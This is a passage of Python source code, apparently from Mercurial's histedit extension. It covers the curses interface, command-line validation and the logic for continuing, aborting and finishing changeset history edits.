r.ctx.hex()[:12], conflicts))\n conflictstr = b\"changed files overlap with %s\" % conflictstr\n else:\n conflictstr = b'no overlap'\n\n win.addstr(y, 1, conflictstr[:length])\n win.noutrefresh()\n\n def helplines(mode):\n if mode == MODE_PATCH:\n help = b\"\"\"\\\n?: help, k/up: line up, j/down: line down, v: stop viewing patch\npgup: prev page, space/pgdn: next page, c: commit, q: abort\n\"\"\"\n else:\n help = b\"\"\"\\\n?: help, k/up: move up, j/down: move down, space: select, v: view patch\nd: drop, e: edit, f: fold, m: mess, p: pick, r: roll\npgup/K: move patch up, pgdn/J: move patch down, c: commit, q: abort\n\"\"\"\n return help.splitlines()\n\n def renderhelp(win, state):\n maxy, maxx = win.getmaxyx()\n mode, _ = state[b'mode']\n for y, line in enumerate(helplines(mode)):\n if y >= maxy:\n break\n addln(win, y, 0, line, curses.color_pair(COLOR_HELP))\n win.noutrefresh()\n\n def renderrules(rulesscr, state):\n rules = state[b'rules']\n pos = state[b'pos']\n selected = state[b'selected']\n start = state[b'modes'][MODE_RULES][b'line_offset']\n\n conflicts = [r.ctx for r in rules if r.conflicts]\n if len(conflicts) > 0:\n line = b\"potential conflict in %s\" % b','.join(\n map(pycompat.bytestr, conflicts)\n )\n addln(rulesscr, -1, 0, line, curses.color_pair(COLOR_WARN))\n\n for y, rule in enumerate(rules[start:]):\n if y >= state[b'page_height']:\n break\n if len(rule.conflicts) > 0:\n rulesscr.addstr(y, 0, b\" \", curses.color_pair(COLOR_WARN))\n else:\n rulesscr.addstr(y, 0, b\" \", curses.COLOR_BLACK)\n\n if y + start == selected:\n rollcolor = COLOR_ROLL_SELECTED\n addln(rulesscr, y, 2, rule, curses.color_pair(COLOR_SELECTED))\n elif y + start == pos:\n rollcolor = COLOR_ROLL_CURRENT\n addln(\n rulesscr,\n y,\n 2,\n rule,\n curses.color_pair(COLOR_CURRENT) | curses.A_BOLD,\n )\n else:\n rollcolor = COLOR_ROLL\n addln(rulesscr, y, 2, rule)\n\n if rule.action == b'roll':\n rulesscr.addstr(\n y,\n 2 + len(rule.prefix),\n rule.desc,\n curses.color_pair(rollcolor),\n )\n\n rulesscr.noutrefresh()\n\n def renderstring(win, state, output, diffcolors=False):\n maxy, maxx = win.getmaxyx()\n length = min(maxy - 1, len(output))\n for y in range(0, length):\n line = output[y]\n if diffcolors:\n if line and line[0] == b'+':\n win.addstr(\n y, 0, line, curses.color_pair(COLOR_DIFF_ADD_LINE)\n )\n elif line and line[0] == b'-':\n win.addstr(\n y, 0, line, curses.color_pair(COLOR_DIFF_DEL_LINE)\n )\n elif line.startswith(b'@@ '):\n win.addstr(y, 0, line, curses.color_pair(COLOR_DIFF_OFFSET))\n else:\n win.addstr(y, 0, line)\n else:\n win.addstr(y, 0, line)\n win.noutrefresh()\n\n def renderpatch(win, state):\n start = state[b'modes'][MODE_PATCH][b'line_offset']\n content = state[b'modes'][MODE_PATCH][b'patchcontents']\n renderstring(win, state, content[start:], diffcolors=True)\n\n def layout(mode):\n maxy, maxx = stdscr.getmaxyx()\n helplen = len(helplines(mode))\n mainlen = maxy - helplen - 12\n if mainlen < 1:\n raise error.Abort(\n _(b\"terminal dimensions %d by %d too small for curses histedit\")\n % (maxy, maxx),\n hint=_(\n b\"enlarge your terminal or use --config ui.interface=text\"\n ),\n )\n return {\n b'commit': (12, maxx),\n b'help': (helplen, maxx),\n b'main': (mainlen, maxx),\n }\n\n def drawvertwin(size, y, x):\n win = curses.newwin(size[0], size[1], y, x)\n y += size[0]\n return win, y, x\n\n state = {\n b'pos': 0,\n b'rules': rules,\n b'selected': None,\n b'mode': (MODE_INIT, MODE_INIT),\n b'page_height': None,\n b'modes': {\n MODE_RULES: {\n b'line_offset': 0,\n },\n MODE_PATCH: {\n b'line_offset': 0,\n },\n },\n b'repo': repo,\n }\n\n # eventloop\n ch = None\n stdscr.clear()\n stdscr.refresh()\n while True:\n oldmode, unused = state[b'mode']\n if oldmode == MODE_INIT:\n changemode(state, MODE_RULES)\n e = event(state, ch)\n\n if e == E_QUIT:\n return False\n if e == E_HISTEDIT:\n return state[b'rules']\n else:\n if e == E_RESIZE:\n size = screen_size()\n if size != stdscr.getmaxyx():\n curses.resizeterm(*size)\n\n curmode, unused = state[b'mode']\n sizes = layout(curmode)\n if curmode != oldmode:\n state[b'page_height'] = sizes[b'main'][0]\n # Adjust the view to fit the current screen size.\n movecursor(state, state[b'pos'], state[b'pos'])\n\n # Pack the windows against the top, each pane spread across the\n # full width of the screen.\n y, x = (0, 0)\n helpwin, y, x = drawvertwin(sizes[b'help'], y, x)\n mainwin, y, x = drawvertwin(sizes[b'main'], y, x)\n commitwin, y, x = drawvertwin(sizes[b'commit'], y, x)\n\n if e in (E_PAGEDOWN, E_PAGEUP, E_LINEDOWN, E_LINEUP):\n if e == E_PAGEDOWN:\n changeview(state, +1, b'page')\n elif e == E_PAGEUP:\n changeview(state, -1, b'page')\n elif e == E_LINEDOWN:\n changeview(state, +1, b'line')\n elif e == E_LINEUP:\n changeview(state, -1, b'line')\n\n # start rendering\n commitwin.erase()\n helpwin.erase()\n mainwin.erase()\n if curmode == MODE_PATCH:\n renderpatch(mainwin, state)\n elif curmode == MODE_HELP:\n renderstring(mainwin, state, __doc__.strip().splitlines())\n else:\n renderrules(mainwin, state)\n rendercommit(commitwin, state)\n renderhelp(helpwin, state)\n curses.doupdate()\n # done rendering\n ch = encoding.strtolocal(stdscr.getkey())\n\n\ndef _chistedit(ui, repo, freeargs, opts):\n \"\"\"interactively edit changeset history via a curses interface\n\n Provides a ncurses interface to histedit. Press ? in chistedit mode\n to see an extensive help. Requires python-curses to be installed.\"\"\"\n\n if curses is None:\n raise error.Abort(_(b\"Python curses library required\"))\n\n # disable color\n ui._colormode = None\n\n try:\n keep = opts.get(b'keep')\n revs = opts.get(b'rev', [])[:]\n cmdutil.checkunfinished(repo)\n cmdutil.bailifchanged(repo)\n\n if os.path.exists(os.path.join(repo.path, b'histedit-state')):\n raise error.Abort(\n _(\n b'history edit already in progress, try '\n b'--continue or --abort'\n )\n )\n revs.extend(freeargs)\n if not revs:\n defaultrev = destutil.desthistedit(ui, repo)\n if defaultrev is not None:\n revs.append(defaultrev)\n if len(revs) != 1:\n raise error.Abort(\n _(b'histedit requires exactly one ancestor revision')\n )\n\n rr = list(repo.set(b'roots(%ld)', scmutil.revrange(repo, revs)))\n if len(rr) != 1:\n raise error.Abort(\n _(\n b'The specified revisions must have '\n b'exactly one common root'\n )\n )\n root = rr[0].node()\n\n topmost = repo.dirstate.p1()\n revs = between(repo, root, topmost, keep)\n if not revs:\n raise error.Abort(\n _(b'%s is not an ancestor of working directory') % short(root)\n )\n\n ctxs = []\n for i, r in enumerate(revs):\n ctxs.append(histeditrule(ui, repo[r], i))\n with util.with_lc_ctype():\n rc = curses.wrapper(functools.partial(_chisteditmain, repo, ctxs))\n curses.echo()\n curses.endwin()\n if rc is False:\n ui.write(_(b\"histedit aborted\\n\"))\n return 0\n if type(rc) is list:\n ui.status(_(b\"performing changes\\n\"))\n rules = makecommands(rc)\n with repo.vfs(b'chistedit', b'w+') as fp:\n for r in rules:\n fp.write(r)\n opts[b'commands'] = fp.name\n return _texthistedit(ui, repo, freeargs, opts)\n except KeyboardInterrupt:\n pass\n return -1\n\n\n@command(\n b'histedit',\n [\n (\n b'',\n b'commands',\n b'',\n _(b'read history edits from the specified file'),\n _(b'FILE'),\n ),\n (b'c', b'continue', False, _(b'continue an edit already in progress')),\n (b'', b'edit-plan', False, _(b'edit remaining actions list')),\n (\n b'k',\n b'keep',\n False,\n _(b\"don't strip old nodes after edit is complete\"),\n ),\n (b'', b'abort', False, _(b'abort an edit in progress')),\n (b'o', b'outgoing', False, _(b'changesets not found in destination')),\n (\n b'f',\n b'force',\n False,\n _(b'force outgoing even for unrelated repositories'),\n ),\n (b'r', b'rev', [], _(b'first revision to be edited'), _(b'REV')),\n ]\n + cmdutil.formatteropts,\n _(b\"[OPTIONS] ([ANCESTOR] | --outgoing [URL])\"),\n helpcategory=command.CATEGORY_CHANGE_MANAGEMENT,\n)\ndef histedit(ui, repo, *freeargs, **opts):\n \"\"\"interactively edit changeset history\n\n This command lets you edit a linear series of changesets (up to\n and including the working directory, which should be clean).\n You can:\n\n - `pick` to [re]order a changeset\n\n - `drop` to omit changeset\n\n - `mess` to reword the changeset commit message\n\n - `fold` to combine it with the preceding changeset (using the later date)\n\n - `roll` like fold, but discarding this commit's description and date\n\n - `edit` to edit this changeset (preserving date)\n\n - `base` to checkout changeset and apply further changesets from there\n\n There are a number of ways to select the root changeset:\n\n - Specify ANCESTOR directly\n\n - Use --outgoing -- it will be the first linear changeset not\n included in destination. (See :hg:`help config.paths.default-push`)\n\n - Otherwise, the value from the \"histedit.defaultrev\" config option\n is used as a revset to select the base revision when ANCESTOR is not\n specified. The first revision returned by the revset is used. By\n default, this selects the editable history that is unique to the\n ancestry of the working directory.\n\n .. container:: verbose\n\n If you use --outgoing, this command will abort if there are ambiguous\n outgoing revisions. For example, if there are multiple branches\n containing outgoing revisions.\n\n Use \"min(outgoing() and ::.)\" or similar revset specification\n instead of --outgoing to specify edit target revision exactly in\n such ambiguous situation. See :hg:`help revsets` for detail about\n selecting revisions.\n\n .. container:: verbose\n\n Examples:\n\n - A number of changes have been made.\n Revision 3 is no longer needed.\n\n Start history editing from revision 3::\n\n hg histedit -r 3\n\n An editor opens, containing the list of revisions,\n with specific actions specified::\n\n pick 5339bf82f0ca 3 Zworgle the foobar\n pick 8ef592ce7cc4 4 Bedazzle the zerlog\n pick 0a9639fcda9d 5 Morgify the cromulancy\n\n Additional information about the possible actions\n to take appears below the list of revisions.\n\n To remove revision 3 from the history,\n its action (at the beginning of the relevant line)\n is changed to 'drop'::\n\n drop 5339bf82f0ca 3 Zworgle the foobar\n pick 8ef592ce7cc4 4 Bedazzle the zerlog\n pick 0a9639fcda9d 5 Morgify the cromulancy\n\n - A number of changes have been made.\n Revision 2 and 4 need to be swapped.\n\n Start history editing from revision 2::\n\n hg histedit -r 2\n\n An editor opens, containing the list of revisions,\n with specific actions specified::\n\n pick 252a1af424ad 2 Blorb a morgwazzle\n pick 5339bf82f0ca 3 Zworgle the foobar\n pick 8ef592ce7cc4 4 Bedazzle the zerlog\n\n To swap revision 2 and 4, its lines are swapped\n in the editor::\n\n pick 8ef592ce7cc4 4 Bedazzle the zerlog\n pick 5339bf82f0ca 3 Zworgle the foobar\n pick 252a1af424ad 2 Blorb a morgwazzle\n\n Returns 0 on success, 1 if user intervention is required (not only\n for intentional \"edit\" command, but also for resolving unexpected\n conflicts).\n \"\"\"\n opts = pycompat.byteskwargs(opts)\n\n # kludge: _chistedit only works for starting an edit, not aborting\n # or continuing, so fall back to regular _texthistedit for those\n # operations.\n if ui.interface(b'histedit') == b'curses' and _getgoal(opts) == goalnew:\n return _chistedit(ui, repo, freeargs, opts)\n return _texthistedit(ui, repo, freeargs, opts)\n\n\ndef _texthistedit(ui, repo, freeargs, opts):\n state = histeditstate(repo)\n with repo.wlock() as wlock, repo.lock() as lock:\n state.wlock = wlock\n state.lock = lock\n _histedit(ui, repo, state, freeargs, opts)\n\n\ngoalcontinue = b'continue'\ngoalabort = b'abort'\ngoaleditplan = b'edit-plan'\ngoalnew = b'new'\n\n\ndef _getgoal(opts):\n if opts.get(b'continue'):\n return goalcontinue\n if opts.get(b'abort'):\n return goalabort\n if opts.get(b'edit_plan'):\n return goaleditplan\n return goalnew\n\n\ndef _readfile(ui, path):\n if path == b'-':\n with ui.timeblockedsection(b'histedit'):\n return ui.fin.read()\n else:\n with open(path, b'rb') as f:\n return f.read()\n\n\ndef _validateargs(ui, repo, state, freeargs, opts, goal, rules, revs):\n # TODO only abort if we try to histedit mq patches, not just\n # blanket if mq patches are applied somewhere\n mq = getattr(repo, 'mq', None)\n if mq and mq.applied:\n raise error.Abort(_(b'source has mq patches applied'))\n\n # basic argument incompatibility processing\n outg = opts.get(b'outgoing')\n editplan = opts.get(b'edit_plan')\n abort = opts.get(b'abort')\n force = opts.get(b'force')\n if force and not outg:\n raise error.Abort(_(b'--force only allowed with --outgoing'))\n if goal == b'continue':\n if any((outg, abort, revs, freeargs, rules, editplan)):\n raise error.Abort(_(b'no arguments allowed with --continue'))\n elif goal == b'abort':\n if any((outg, revs, freeargs, rules, editplan)):\n raise error.Abort(_(b'no arguments allowed with --abort'))\n elif goal == b'edit-plan':\n if any((outg, revs, freeargs)):\n raise error.Abort(\n _(b'only --commands argument allowed with --edit-plan')\n )\n else:\n if state.inprogress():\n raise error.Abort(\n _(\n b'history edit already in progress, try '\n b'--continue or --abort'\n )\n )\n if outg:\n if revs:\n raise error.Abort(_(b'no revisions allowed with --outgoing'))\n if len(freeargs) > 1:\n raise error.Abort(\n _(b'only one repo argument allowed with --outgoing')\n )\n else:\n revs.extend(freeargs)\n if len(revs) == 0:\n defaultrev = destutil.desthistedit(ui, repo)\n if defaultrev is not None:\n revs.append(defaultrev)\n\n if len(revs) != 1:\n raise error.Abort(\n _(b'histedit requires exactly one ancestor revision')\n )\n\n\ndef _histedit(ui, repo, state, freeargs, opts):\n fm = ui.formatter(b'histedit', opts)\n fm.startitem()\n goal = _getgoal(opts)\n revs = opts.get(b'rev', [])\n nobackup = not ui.configbool(b'rewrite', b'backup-bundle')\n rules = opts.get(b'commands', b'')\n state.keep = opts.get(b'keep', False)\n\n _validateargs(ui, repo, state, freeargs, opts, goal, rules, revs)\n\n hastags = False\n if revs:\n revs = scmutil.revrange(repo, revs)\n ctxs = [repo[rev] for rev in revs]\n for ctx in ctxs:\n tags = [tag for tag in ctx.tags() if tag != b'tip']\n if not hastags:\n hastags = len(tags)\n if hastags:\n if ui.promptchoice(\n _(\n b'warning: tags associated with the given'\n b' changeset will be lost after histedit.\\n'\n b'do you want to continue (yN)? $$ &Yes $$ &No'\n ),\n default=1,\n ):\n raise error.Abort(_(b'histedit cancelled\\n'))\n # rebuild state\n if goal == goalcontinue:\n state.read()\n state = bootstrapcontinue(ui, state, opts)\n elif goal == goaleditplan:\n _edithisteditplan(ui, repo, state, rules)\n return\n elif goal == goalabort:\n _aborthistedit(ui, repo, state, nobackup=nobackup)\n return\n else:\n # goal == goalnew\n _newhistedit(ui, repo, state, revs, freeargs, opts)\n\n _continuehistedit(ui, repo, state)\n _finishhistedit(ui, repo, state, fm)\n fm.end()\n\n\ndef _continuehistedit(ui, repo, state):\n \"\"\"This function runs after either:\n - bootstrapcontinue (if the goal is 'continue')\n - _newhistedit (if the goal is 'new')\n \"\"\"\n # preprocess rules so that we can hide inner folds from the user\n # and only show one editor\n actions = state.actions[:]\n for idx, (action, nextact) in enumerate(zip(actions, actions[1:] + [None])):\n if action.verb == b'fold' and nextact and nextact.verb == b'fold':\n state.actions[idx].__class__ = _multifold\n\n # Force an initial state file write, so the user can run --abort/continue\n # even if there's an exception before the first transaction serialize.\n state.write()\n\n tr = None\n # Don't use singletransaction by default since it rolls the entire\n # transaction back if an unexpected exception happens (like a\n # pretxncommit hook throws, or the user aborts the commit msg editor).\n if ui.configbool(b\"histedit\", b\"singletransaction\"):\n # Don't use a 'with' for the transaction, since actions may close\n # and reopen a transaction. For example, if the action executes an\n # external process it may choose to commit the transaction first.\n tr = repo.transaction(b'histedit')\n progress = ui.makeprogress(\n _(b\"editing\"), unit=_(b'changes'), total=len(state.actions)\n )\n with progress, util.acceptintervention(tr):\n while state.actions:\n state.write(tr=tr)\n actobj = state.actions[0]\n progress.increment(item=actobj.torule())\n ui.debug(\n b'histedit: processing %s %s\\n' % (actobj.verb, actobj.torule())\n )\n parentctx, replacement_ = actobj.run()\n state.parentctxnode = parentctx.node()\n state.replacements.extend(replacement_)\n state.actions.pop(0)\n\n state.write()\n\n\ndef _finishhistedit(ui, repo, state, fm):\n \"\"\"This action runs when histedit is finishing its session\"\"\"\n mergemod.update(repo[state.parentctxnode])\n\n mapping, tmpnodes, created, ntm = processreplacement(state)\n if mapping:\n for prec, succs in pycompat.iteritems(mapping):\n if not succs:\n ui.debug(b'histedit: %s is dropped\\n' % short(prec))\n else:\n ui.debug(\n b'histedit: %s is replaced by %s\\n'\n % (short(prec), short(succs[0]))\n )\n if len(succs) > 1:\n m = b'histedit: %s'\n for n in succs[1:]:\n ui.debug(m % short(n))\n\n if not state.keep:\n if mapping:\n movetopmostbookmarks(repo, state.topmost, ntm)\n # TODO update mq state\n else:\n mapping = {}\n\n for n in tmpnodes:\n if n in repo:\n mapping[n] = ()\n\n # remove entries about unknown nodes\n has_node = repo.unfiltered().changelog.index.has_node\n mapping = {\n k: v\n for k, v in mapping.items()\n if has_node(k) and all(has_node(n) for n in v)\n }\n scmutil.cleanupnodes(repo, mapping, b'histedit')\n hf = fm.hexfunc\n fl = fm.formatlist\n fd = fm.formatdict\n nodechanges = fd(\n {\n hf(oldn): fl([hf(n) for n in newn], name=b'node')\n for oldn, newn in pycompat.iteritems(mapping)\n },\n key=b\"oldnode\",\n value=b\"newnodes\",\n )\n fm.data(nodechanges=nodechanges)\n\n state.clear()\n if os.path.exists(repo.sjoin(b'undo')):\n os.unlink(repo.sjoin(b'undo'))\n if repo.vfs.exists(b'histedit-last-edit.txt'):\n repo.vfs.unlink(b'histedit-last-edit.txt')\n\n\ndef _aborthistedit(ui, repo, state, nobackup=False):\n try:\n state.read()\n __, leafs, tmpnodes, __ = processreplacement(state)\n ui.debug(b'restore wc to old parent %s\\n' % short(state.topmost))\n\n # Recover our old commits if necessary\n if not state.topmost in repo and state.backupfile:\n backupfile = repo.vfs.join(state.backupfile)\n f = hg.openpath(ui, backupfile)\n gen = exchange.readbundle(ui, f, backupfile)\n with repo.transaction(b'histedit.abort') as tr:\n bundle2.applybundle(\n repo,\n gen,\n tr,\n source=b'histedit',\n url=b'bundle:' + backupfile,\n )\n\n os.remove(backupfile)\n\n # check whether we should update away\n if repo.unfiltered().revs(\n b'parents() and (%n or %ln::)',\n state.parentctxnode,\n leafs | tmpnodes,\n ):\n hg.clean(repo, state.topmost, show_stats=True, quietempty=True)\n cleanupnode(ui, repo, tmpnodes, nobackup=nobackup)\n cleanupnode(ui, repo, leafs, nobackup=nobackup)\n except Exception:\n if state.inprogress():\n ui.warn(\n _(\n b'warning: encountered an exception during histedit '\n b'--abort; the repository may not have been completely '\n b'cleaned up\\n'\n )\n )\n raise\n finally:\n state.clear()\n\n\ndef hgaborthistedit(ui, repo):\n state = histeditstate(repo)\n nobackup = not ui.configbool(b'rewrite', b'backup-bundle')\n with repo.wlock() as wlock, repo.lock() as lock:\n state.wlock = wlock\n state.lock = lock\n _aborthistedit(ui, repo, state, nobackup=nobackup)\n\n\ndef _edithisteditplan(ui, repo, state, rules):\n state.read()\n if not rules:\n comment = geteditcomment(\n ui, short(state.parentctxnode), short(state.topmost)\n )\n rules = ruleeditor(repo, ui, state.actions, comment)\n else:\n rules = _readfile(ui, rules)\n actions = parserules(rules, state)\n ctxs = [repo[act.node] for act in state.actions if act.node]\n warnverifyactions(ui, repo, actions, state, ctxs)\n state.actions = actions\n state.write()\n\n\ndef _newhistedit(ui, repo, state, revs, freeargs, opts):\n outg = opts.get(b'outgoing')\n rules = opts.get(b'commands', b'')\n force = opts.get(b'force')\n\n cmdutil.checkunfinished(repo)\n cmdutil.bailifchanged(repo)\n\n topmost = repo.dirstate.p1()\n if outg:\n if freeargs:\n remote = freeargs[0]\n else:\n remote = None\n root = findoutgoing(ui, repo, remote, force, opts)\n else:\n rr = list(repo.set(b'roots(%ld)', scmutil.revrange(repo, revs)))\n if len(rr) != 1:\n raise error.Abort(\n _(\n b'The specified revisions must have '\n b'exactly one common root'\n )\n )\n root = rr[0].node()\n\n revs = between(repo, root, topmost, state.keep)\n if not revs:\n raise error.Abort(\n _(b'%s is not an ancestor of working directory') % short(root)\n )\n\n ctxs = [repo[r] for r in revs]\n\n wctx = repo[None]\n # Please don't ask me why `ancestors` is this value. I figured it\n # out with print-debugging, not by actually understanding what the\n # merge code is doing. :(\n ancs = [repo[b'.']]\n # Sniff-test to make sure we won't collide with untracked files in\n # the working directory. If we don't do this, we can get a\n # collision after we've started histedit and backing out gets ugly\n # for everyone, especially the user.\n for c in [ctxs[0].p1()] + ctxs:\n try:\n mergemod.calculateupdates(\n repo,\n wctx,\n c,\n ancs,\n # These parameters were determined by print-debugging\n # what happens later on inside histedit.\n branchmerge=False,\n force=False,\n acceptremote=False,\n followcopies=False,\n )\n except error.Abort:\n raise error.Abort(\n _(\n b\"untracked files in working directory conflict with files in %s\"\n )\n % c\n )\n\n if not rules:\n comment = geteditcomment(ui, short(root), short(topmost))\n actions = [pick(state, r) for r in revs]\n rules = ruleeditor(repo, ui, actions, comment)\n else:\n rules = _readfile(ui, rules)\n actions = parserules(rules, state)\n warnverifyactions(ui, repo, actions, state, ctxs)\n\n parentctxnode = repo[root].p1().node()\n\n state.parentctxnode = parentctxnode\n state.actions = actions\n state.topmost = topmost\n state.replacements = []\n\n ui.log(\n b\"histedit\",\n b\"%d actions to histedit\\n\",\n len(actions),\n histedit_num_actions=len(actions),\n )\n\n # Create a backup so we can always abort completely.\n backupfile = None\n if not obsolete.isenabled(repo, obsolete.createmarkersopt):\n backupfile = repair.backupbundle(\n repo, [parentctxnode], [topmost], root, b'histedit'\n )\n state.backupfile = backupfile\n\n\ndef _getsummary(ctx):\n # a common pattern is to extract the summary but default to the empty\n # string\n summary = ctx.description() or b''\n if summary:\n summary = summary.splitlines()[0]\n return summary\n\n\ndef bootstrapcontinue(ui, state, opts):\n repo = state.repo\n\n ms = mergestatemod.mergestate.read(repo)\n mergeutil.checkunresolved(ms)\n\n if state.actions:\n actobj = state.actions.pop(0)\n\n if _isdirtywc(repo):\n actobj.continuedirty()\n if _isdirtywc(repo):\n abortdirty()\n\n parentctx, replacements = actobj.continueclean()\n\n state.parentctxnode = parentctx.node()\n state.replacements.extend(replacements)\n\n return state\n\n\ndef between(repo, old, new, keep):\n \"\"\"select and validate the set of revision to edit\n\n When keep is false, the specified set can't have children.\"\"\"\n revs = repo.revs(b'%n::%n', old, new)\n if revs and not keep:\n rewriteutil.precheck(repo, revs, b'edit')\n if repo.revs(b'(%ld) and merge()', revs):\n raise error.Abort(_(b'cannot edit history that contains merges'))\n return pycompat.maplist(repo.changelog.node, revs)\n\n\ndef ruleeditor(repo, ui, actions, editcomment=b\"\"):\n \"\"\"open an editor to edit rules\n\n rules are in the format [ [act, ctx], ...] like in state.rules\n \"\"\"\n if repo.ui.configbool(b\"experimental\", b\"histedit.autoverb\"):\n newact = util.sortdict()\n for act in actions:\n ctx = repo[act.node]\n summary = _getsummary(ctx)\n fword = summary.split(b' ', 1)[0].lower()\n added = False\n\n # if it doesn't end with the special character '!' just skip this\n if fword.endswith(b'!'):\n fword = fword[:-1]\n if fword in primaryactions | secondaryactions | tertiaryactions:\n act.verb = fword\n # get the target summary\n tsum = summary[len(fword) + 1 :].lstrip()\n # safe but slow: reverse iterate over the actions so we\n # don't clash on two commits having the same summary\n for na, l in reversed(list(pycompat.iteritems(newact))):\n actx = repo[na.node]\n asum = _getsummary(actx)\n if asum == tsum:\n added = True\n l.append(act)\n break\n\n if not added:\n newact[act] = []\n\n # copy over and flatten the new list\n actions = []\n for na, l in pycompat.iteritems(newact):\n actions.append(na)\n actions += l\n\n rules = b'\\n'.join([act.torule() for act in actions])\n rules += b'\\n\\n'\n rules += editcomment\n rules = ui.edit(\n rules,\n ui.username(),\n {b'prefix': b'histedit'},\n repopath=repo.path,\n action=b'histedit',\n )\n\n # Save edit rules in .hg/histedit-last-edit.txt in case\n # the user needs to ask for help after something\n # surprising happens.\n with repo.vfs(b'histedit-last-edit.txt', b'wb') as f:\n f.write(rules)\n\n return rules\n\n\ndef parserules(rules, state):\n \"\"\"Read the histedit rules string and return list of action objects\"\"\"\n rules = [\n l\n for l in (r.strip() for r in rules.splitlines())\n if l and not l.startswith(b'#')\n ]\n actions = []\n for r in rules:\n if b' ' not in r:\n raise error.ParseError(_(b'malformed line \"%s\"') % r)\n verb, rest = r.split(b' ', 1)\n\n if verb not in actiontable:\n raise error.ParseError(_(b'unknown action \"%s\"') % verb)\n\n action = actiontable[verb].fromrule(state, rest)\n actions.append(action)\n return actions\n\n\ndef warnverifyactions(ui, repo, actions, state, ctxs):\n try:\n verifyactions(actions, state, ctxs)\n except error.ParseError:\n if repo.vfs.exists(b'histedit-last-edit.txt'):\n ui.warn(\n _(\n b'warning: histedit rules saved '\n b'to: .hg/histedit-last-edit.txt\\n'\n )\n )\n raise\n\n\ndef verifyactions(actions, state, ctxs):\n \"\"\"Verify that there exists exactly one action per given changeset and\n other constraints.\n\n Will abort if there are to many or too few rules, a malformed rule,\n or a rule on a changeset outside of the user-given range.\n \"\"\"\n expected = {c.node() for c in ctxs}\n seen = set()\n prev = None\n\n if actions and actions[0].verb in [b'roll', b'fold']:\n raise error.ParseError(\n _(b'first changeset cannot use verb \"%s\"') % actions[0].verb\n )\n\n for action in actions:\n action.verify(prev, expected, seen)\n prev = action\n if action.node is not None:\n seen.add(action.node)\n missing = sorted(expected - seen) # sort to stabilize output\n\n if state.repo.ui.configbool(b'histedit', b'dropmissing'):\n if len(actions) == 0:\n raise error.ParseError(\n _(b'no rules provided'),\n hint=_(b'use strip extension to remove commits'),\n )\n\n drops = [drop(state, n) for n in missing]\n # put the in the beginning so they execute immediately and\n # don't show in the edit-plan in the future\n actions[:0] = drops\n elif missing:\n raise error.ParseError(\n _(b'missing rules for changeset %s') % short(missing[0]),\n hint=_(\n b'use \"drop %s\" to discard, see also: '\n b\"'hg help -e histedit.config'\"\n )\n % short(missing[0]),\n )\n\n\ndef adjustreplacementsfrommarkers(repo, oldreplacements):\n \"\"\"Adjust replacements from obsolescence markers\n\n Replacements structure is originally generated based on\n histedit's state and does not account for changes that are\n not recorded there. This function fixes that by adding\n data read from obsolescence markers\"\"\"\n if not obsolete.isenabled(repo, obsolete.createmarkersopt):\n return oldreplacements\n\n unfi = repo.unfiltered()\n get_rev = unfi.changelog.index.get_rev\n obsstore = repo.obsstore\n newreplacements = list(oldreplacements)\n oldsuccs = [r[1] for r in oldreplacements]\n # successors that have already been added to succstocheck once\n seensuccs = set().union(\n *oldsuccs\n ) # create a set from an iterable of tuples\n succstocheck = list(seensuccs)\n while succstocheck:\n n = succstocheck.pop()\n missing = get_rev(n) is None\n markers = obsstore.successors.get(n, ())\n if missing and not markers:\n # dead end, mark it as such\n newreplacements.append((n, ()))\n for marker in markers:\n nsuccs = marker[1]\n newreplacements.append((n, nsuccs))\n for nsucc in nsuccs:\n if nsucc not in seensuccs:\n seensuccs.add(nsucc)\n succstocheck.append(nsucc)\n\n return newreplacements\n\n\ndef processreplacement(state):\n \"\"\"process the list of replacements to return\n\n 1) the final mapping between original and created nodes\n 2) the list of temporary node created by histedit\n 3) the list of new commit created by histedit\"\"\"\n replacements = adjustreplacementsfrommarkers(state.repo, state.replacements)\n allsuccs = set()\n replaced = set()\n fullmapping = {}\n # initialize basic set\n # fullmapping records all operations recorded in replacement\n for rep in replacements:\n allsuccs.update(rep[1])\n replaced.add(rep[0])\n fullmapping.setdefault(rep[0], set()).update(rep[1])\n new = allsuccs - replaced\n tmpnodes = allsuccs & replaced\n # Reduce content fullmapping into direct relation between original nodes\n # and final node created during history edition\n # Dropped changeset are replaced by an empty list\n toproceed = set(fullmapping)\n final = {}\n while toproceed:\n for x in list(toproceed):\n succs = fullmapping[x]\n for s in list(succs):\n if s in toproceed:\n # non final node with unknown closure\n # We can't process this now\n break\n elif s in final:\n # non final node, replace with closure\n succs.remove(s)\n succs.update(final[s])\n else:\n final[x] = succs\n toproceed.remove(x)\n # remove tmpnodes from final mapping\n for n in tmpnodes:\n del final[n]\n # we expect all changes involved in final to exist in the repo\n # turn `final` into list (topologically sorted)\n get_rev = state.repo.changelog.index.get_rev\n for prec, succs in final.items():\n final[prec] = sorted(succs, key=get_rev)\n\n # computed topmost element (necessary for bookmark)\n if new:\n newtopmost = sorted(new, key=state.repo.changelog.rev)[-1]\n elif not final:\n # Nothing rewritten at all. we won't need `newtopmost`\n # It is the same as `oldtopmost` and `processreplacement` know it\n newtopmost = None\n else:\n # every body died. The newtopmost is the parent of the root.\n r = state.repo.changelog.rev\n newtopmost = state.repo[sorted(final, key=r)[0]].p1().node()\n\n return final, tmpnodes, new, newtopmost\n\n\ndef movetopmostbookmarks(repo, oldtopmost, newtopmost):\n \"\"\"Move bookmark from oldtopmost to newly created topmost\n\n This is arguably a feature and we may only want that for the active\n bookmark. But the behavior is kept compatible with the old version for now.\n \"\"\"\n if not oldtopmost or not newtopmost:\n return\n oldbmarks = repo.nodebookmarks(oldtopmost)\n if oldbmarks:\n with repo.lock(), repo.transaction(b'histedit') as tr:\n marks = repo._bookmarks\n changes = []\n for name in oldbmarks:\n changes.append((name, newtopmost))\n marks.applychanges(repo, tr, changes)\n\n\ndef cleanupnode(ui, repo, nodes, nobackup=False):\n \"\"\"strip a group of nodes from the repository\n\n The set of node to strip may contains unknown nodes.\"\"\"\n with repo.lock():\n # do not let filtering get in the way of the cleanse\n # we should probably get rid of obsolescence marker created during the\n # histedit, but we currently do not have such information.\n repo = repo.unfiltered()\n # Find all nodes that need to be stripped\n # (we use %lr instead of %ln to silently ignore unknown items)\n has_node = repo.changelog.index.has_node\n nodes = sorted(n for n in nodes if has_node(n))\n roots = [c.node() for c in repo.set(b\"roots(%ln)\", nodes)]\n if roots:\n backup = not nobackup\n repair.strip(ui, repo, roots, backup=backup)\n\n\ndef stripwrapper(orig, ui, repo, nodelist, *args, **kwargs):\n if isinstance(nodelist, bytes):\n nodelist = [nodelist]\n state = histeditstate(repo)\n if state.inprogress():\n state.read()\n histedit_nodes = {\n action.node for action in state.actions if action.node\n }\n 